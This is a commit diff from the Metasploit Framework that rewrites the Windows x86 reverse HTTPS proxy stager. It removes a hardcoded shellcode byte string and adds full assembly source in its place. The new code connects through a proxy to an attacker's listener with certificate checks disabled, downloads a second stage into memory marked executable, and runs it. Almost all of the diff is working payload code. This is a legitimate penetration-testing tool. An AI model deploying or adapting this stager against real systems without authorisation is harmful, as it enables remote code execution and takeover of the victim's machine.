fix(payloads): re-wrote reverse_https_proxy stager

dledda-r7 · dledda-r7 · commit 3167a6c73c02 · 2024-11-29T07:57:51.000-05:00
diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -3,61 +3,28 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 module MetasploitModule
-
   CachedSize = 384
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Reverse HTTPS Stager with Support for Custom Proxy',
-      'Description'   => 'Tunnel communication over HTTP using SSL with custom proxy support',
-      'Author'        => ['hdm','corelanc0d3r <peter.ve[at]corelan.be>', 'amaloteaux'],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseHttpsProxy,
-      'Convention'    => 'sockedi https',
-      'Stager'        =>
-        {
-          'Payload' =>
-            "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
-            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
-            "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
-            "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
-            "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
-            "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
-            "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
-            "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
-            "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
-            "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\xE8\x0F\x00\x00\x00" +
-            "\x50\x52\x4F\x58\x59\x48\x4F\x53\x54\x3A\x50\x4F\x52\x54\x00\x59" +
-            "\x31\xFF\x57\x54\x51\x6A\x03\x6A\x00\x68\x3A\x56\x79\xA7\xFF\xD5" +
-            "\xE9\xC4\x00\x00\x00\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C" +
-            "\x11\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x89\xC6\x50\x52" +
-            "\x4F\x58\x59\x5F\x41\x55\x54\x48\x5F\x53\x54\x41\x52\x54\xE8\x0F" +
-            "\x00\x00\x00\x50\x52\x4F\x58\x59\x5F\x55\x53\x45\x52\x4E\x41\x4D" +
-            "\x45\x00\x59\x6A\x0F\x51\x6A\x2B\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
-            "\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58\x59\x5F\x50\x41\x53\x53\x57" +
-            "\x4F\x52\x44\x00\x59\x6A\x0F\x51\x6A\x2C\x56\x68\x75\x46\x9E\x86" +
-            "\xFF\xD5\x50\x52\x4F\x58\x59\x5F\x41\x55\x54\x48\x5F\x53\x54\x4F" +
-            "\x50\xEB\x48\x59\x31\xD2\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51" +
-            "\x52\x56\x68\xEB\x55\x2E\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x68\x80" +
-            "\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86" +
-            "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x2D\x06\x18\x7B\xFF\xD5" +
-            "\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xD5\xEB\x49\xE8\xB3\xFF\xFF\xFF" +
-            "\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40" +
-            "\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5" +
-            "\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68" +
-            "\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0" +
-            "\x75\xE5\x58\xC3\xE8\xEC\xFE\xFF\xFF"
-        }
-      ))
-
-
+    super(
+      merge_info(
+        info,
+        'Name' => 'Reverse HTTPS Stager with Support for Custom Proxy',
+        'Description' => 'Tunnel communication over HTTP using SSL with custom proxy support',
+        'Author' => ['hdm', 'corelanc0d3r <peter.ve[at]corelan.be>', 'amaloteaux'],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Handler' => Msf::Handler::ReverseHttpsProxy,
+        'Convention' => 'sockedi https',
+        'Stager' => { 'Payload' => '' }
+      )
+    )
   end
 
   #
@@ -71,82 +38,211 @@ def stage_over_connection?
   # Generate the first stage
   #
   def generate(_opts = {})
-    p = super
-
-    i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW) + "\x00"
-    p[i, u.length] = u
-
-    # patch proxy info
     proxyhost = datastore['HttpProxyHost'].to_s
-    proxyport = datastore['HttpProxyPort'].to_s || "8080"
-
-    if Rex::Socket.is_ipv6?(proxyhost)
-      proxyhost = "[#{proxyhost}]"
-    end
+    proxyhost = "[#{proxyhost}]" if Rex::Socket.is_ipv6?(proxyhost)
+    proxyport = datastore['HttpProxyPort'].to_s || '8080'
+    proxyinfo = proxyhost
 
-    proxyinfo = proxyhost + ":" + proxyport
-    if proxyport == "80"
-      proxyinfo = proxyhost
-    end
+    proxyinfo = "#{proxyhost}:#{proxyport}" unless proxyport == '80'
+    protocol = 'socks='
     if datastore['HttpProxyType'].to_s == 'HTTP'
-      proxyinfo = 'http://' + proxyinfo
-    else #socks
-      proxyinfo = 'socks=' + proxyinfo
+      protocol = 'http://'
     end
-
-    proxyloc = p.index("PROXYHOST:PORT")
-    p = p.gsub("PROXYHOST:PORT",proxyinfo)
-
-    # Patch the call
-    calloffset = proxyinfo.length + 1
-    p[proxyloc-4] = [calloffset].pack('V')[0]
-
-    # Authentication credentials have not been specified
-    if datastore['HttpProxyUser'].to_s == '' ||
-       datastore['HttpProxyPass'].to_s == '' ||
-       datastore['HttpProxyType'].to_s == 'SOCKS'
-
-      jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START")
-
-      # Remove the authentication code
-      p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "")
-    else
-      username_size_diff = 14 - datastore['HttpProxyUser'].to_s.length
-      password_size_diff = 14 - datastore['HttpProxyPass'].to_s.length
-      jmp_offset =
-        16 + # PROXY_AUTH_START length
-        15 + # PROXY_AUTH_STOP length
-        username_size_diff + # Difference between datastore HttpProxyUser length  and db "HttpProxyUser length"
-        password_size_diff   # Same with HttpProxyPass
-
-      # Patch call offset
-      username_loc = p.index("PROXY_USERNAME")
-      p[username_loc - 4, 4] = [15 - username_size_diff].pack("V")
-      password_loc = p.index("PROXY_PASSWORD")
-      p[password_loc - 4, 4] = [15 - password_size_diff].pack("V")
-
-      # Remove markers & change login/password
-      p = p.gsub("PROXY_AUTH_START","")
-      p = p.gsub("PROXY_AUTH_STOP","")
-      p = p.gsub("PROXY_USERNAME", datastore['HttpProxyUser'].to_s)
-      p = p.gsub("PROXY_PASSWORD", datastore['HttpProxyPass'].to_s)
+    proxyinfo = protocol + proxyinfo
+
+    proxy_auth_asm = ''
+    unless datastore['HttpProxyUser'].to_s == '' ||
+           datastore['HttpProxyPass'].to_s == '' ||
+           datastore['HttpProxyType'].to_s == 'SOCKS'
+      proxy_auth_asm = %(
+          call set_proxy_username
+      proxy_username:
+            db "#{datastore['HttpProxyUser']}",0x00
+      set_proxy_username:
+          pop ecx                ; Save the proxy username
+          push dword 15 	       ; DWORD dwBufferLength
+          push ecx  	 	         ; LPVOID lpBuffer (username)
+          push byte 43           ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
+          push esi		           ; hConnection
+          push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+          call ebp
+
+          call set_proxy_password
+      proxy_password:
+            db "#{datastore['HttpProxyPass']}",0x00
+      set_proxy_password:
+          pop ecx                ; Save the proxy password
+          push dword 15		       ; DWORD dwBufferLength
+          push ecx  	 	         ; LPVOID lpBuffer (password)
+          push byte 44           ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
+          push esi		           ; hConnection
+          push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+          call ebp
+      )
     end
 
-    # Patch jmp dbl_get_server_host
-    jmphost_loc = p.index("\x68\x3a\x56\x79\xa7\xff\xd5") + 8 # push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" ) ; call ebp
-    p[jmphost_loc, 4] = [p[jmphost_loc, 4].unpack("V")[0] - jmp_offset].pack("V")
-
-    # Patch call Internetopen
-    p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("V")[0] + jmp_offset].pack("V")
-
-    # Patch the LPORT
-    lportloc = p.index("\x68\x5c\x11\x00\x00")  # PUSH DWORD 4444
-    p[lportloc+1,4] = [datastore['LPORT'].to_i].pack('V')
-
-    # Append LHOST and return payload
-    p + datastore['LHOST'].to_s + "\x00"
-
+    payload = %(
+        cld
+        call start
+        #{asm_block_api}
+    start:
+        pop ebp
+    load_wininet:
+        push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
+        push 0x696e6977        ; ...
+        push esp               ; Push a pointer to the "wininet" string on the stack.
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        call ebp               ; LoadLibraryA( "wininet" )
+        call internetopen
+
+    proxy_server_name:
+        db "#{proxyinfo}",0x00
+
+    internetopen:
+        pop ecx                ; pointer to proxy_server_name
+        xor edi,edi
+        push edi               ; DWORD dwFlags
+        push esp               ; LPCTSTR lpszProxyBypass (empty)
+        push ecx               ; LPCTSTR lpszProxyName
+        push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY  = 3)
+        push 0                 ; NULL pointer
+        ;  push esp            ; LPCTSTR lpszAgent ("\x00") // doesn't seem to work with this
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+        call ebp
+        jmp dbl_get_server_host
+
+    internetconnect:
+        pop ebx                           ; Save the hostname pointer
+        xor ecx, ecx
+        push ecx                          ; DWORD_PTR dwContext (NULL)
+        push ecx                          ; dwFlags
+        push 3                            ; DWORD dwService (INTERNET_SERVICE_HTTP)
+        push ecx                          ; password
+        push ecx                          ; username
+        push #{datastore['LPORT']}        ; PORT
+        push ebx                          ; HOSTNAME
+        push eax                          ; HINTERNET hInternet
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
+        call ebp
+
+        mov esi,eax		 ; safe hConnection
+        #{proxy_auth_asm}
+        jmp get_server_uri
+
+    httpopenrequest:
+        pop ecx
+        xor edx, edx          ; NULL
+        push edx              ; dwContext (NULL)
+        push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
+            ;0x80000000 |     ; INTERNET_FLAG_RELOAD
+            ;0x04000000 |     ; INTERNET_NO_CACHE_WRITE
+            ;0x00800000 |     ; INTERNET_FLAG_SECURE
+            ;0x00200000 |     ; INTERNET_FLAG_NO_AUTO_REDIRECT
+            ;0x00001000 |     ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+            ;0x00002000 |     ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+            ;0x00000200       ; INTERNET_FLAG_NO_UI
+        push edx              ; accept types
+        push edx              ; referrer
+        push edx              ; version
+        push ecx              ; url
+        push edx              ; method
+        push esi              ; hConnection
+        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+        call ebp
+        mov esi, eax           ; hHttpRequest
+
+    set_retry:
+        push 0x10
+        pop ebx
+
+    ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
+    set_security_options:
+        push 0x00003380
+                              ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+                              ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+                              ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+                              ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+                              ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
+        mov eax, esp
+        push 4                ; sizeof(dwFlags)
+        push eax              ; &dwFlags
+        push 31               ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+        push esi              ; hRequest
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
+        call ebp
+
+    httpsendrequest:
+        xor edi, edi
+        push edi               ; optional length
+        push edi               ; optional
+        push edi               ; dwHeadersLength
+        push edi               ; headers
+        push esi               ; hHttpRequest
+        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
+        call ebp
+        test eax,eax
+        jnz allocate_memory
+
+    try_it_again:
+        dec ebx
+        jz failure
+        jmp set_security_options
+
+    dbl_get_server_host:
+        jmp get_server_host
+
+    get_server_uri:
+        call httpopenrequest
+
+    server_uri:
+        db "/#{generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW)}", 0x00
+
+    failure:
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}        ; hardcoded to exitprocess for size
+        call ebp
+
+    allocate_memory:
+        push 0x40              ; PAGE_EXECUTE_READWRITE
+        push 0x1000            ; MEM_COMMIT
+        push 0x00400000        ; Stage allocation (8Mb ought to do us)
+        push edi               ; NULL as we dont care where the allocation is (zero'd from the prev function)
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
+        call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+    download_prep:
+        xchg eax, ebx          ; place the allocated base address in ebx
+        push ebx               ; store a copy of the stage base address on the stack
+        push ebx               ; temporary storage for bytes read count
+        mov edi, esp           ; &bytesRead
+
+    download_more:
+        push edi               ; &bytesRead
+        push 8192              ; read length
+        push ebx               ; buffer
+        push esi               ; hRequest
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+        call ebp
+
+        test eax,eax           ; download failed? (optional?)
+        jz failure
+
+        mov eax, [edi]
+        add ebx, eax           ; buffer += bytes_received
+
+        test eax,eax           ; optional?
+        jnz download_more      ; continue until it returns 0
+        pop eax                ; clear the temporary storage
+
+    execute_stage:
+        ret                    ; dive into the stored stage address
+
+    get_server_host:
+        call internetconnect
+    server_host:
+        db "#{datastore['LHOST']}",0x00
+    )
+
+    Metasm::Shellcode.assemble(Metasm::X86.new, payload).encode_string
   end
 
   #
@@ -156,4 +252,3 @@ def wfs_delay
     20
   end
 end
-
